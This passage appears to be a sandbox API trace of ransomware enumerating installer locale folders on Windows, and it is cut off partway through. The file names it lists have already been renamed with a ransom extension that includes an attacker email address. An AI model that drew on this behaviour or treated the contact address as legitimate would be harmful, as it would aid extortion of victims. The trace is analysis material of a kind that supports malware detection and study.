ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.969] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b65e7a1, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b65e7a1, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b89975c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x10b4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.969] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b68346a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b68346a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b89975c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x142c6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.969] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba2fb18, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba2fb18, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baee50d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.969] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba2fb18, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba2fb18, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baee50d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.969] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0283.971] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.971] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1046", cAlternateFileName="")) returned 1 [0283.971] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.971] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0283.974] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.974] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b68346a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b68346a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b873622, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf54, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.974] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b6ae80e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b6ae80e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b84fa5e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13c66, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.975] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba55c2e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba55c2e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baa20bc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.975] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba55c2e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba55c2e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5baa20bc, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.976] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0283.977] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.977] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1049", cAlternateFileName="")) returned 1 [0283.977] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.977] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0283.980] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.980] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b95876f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd5a4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.980] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9e31e5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13f46, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.980] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5baa20bc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5baa20bc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be0f7c7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.980] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5baa20bc, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5baa20bc, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be0f7c7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.980] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0283.982] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.982] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1053", cAlternateFileName="")) returned 1 [0283.982] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.982] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0283.984] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.984] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8bf9ef, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8bf9ef, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b9320a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.985] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e98c2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b8e98c2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ba55c2e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13076, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.985] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bac8a6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bac8a6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be35a54, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.985] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bac8a6e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bac8a6e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5be35a54, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.985] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0283.986] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.986] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1055", cAlternateFileName="")) returned 1 [0283.986] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.986] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0283.994] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.994] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b95876f, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b95876f, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.994] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c071cfd, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c071cfd, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c097f88, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12d16, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.994] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf66e68, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf66e68, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf66e68, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.994] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5bf66e68, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5bf66e68, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bf66e68, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.995] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0283.996] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.996] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="2052", cAlternateFileName="")) returned 1 [0283.996] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.996] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948268 [0283.998] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.998] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ba0974a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ba0974a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bfd9334, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.998] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c0e434b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c0e434b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c0e434b, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee06, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.999] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be5bbc3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be5bbc3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.999] FindNextFileW (in: hFindFile=0x3948268, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5be5bbc3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5be5bbc3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5bea7fff, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.999] FindClose (in: hFindFile=0x3948268 | out: hFindFile=0x3948268) returned 1 [0284.000] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0284.000] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="2070", cAlternateFileName="")) returned 1 [0284.000] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0284.000] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, 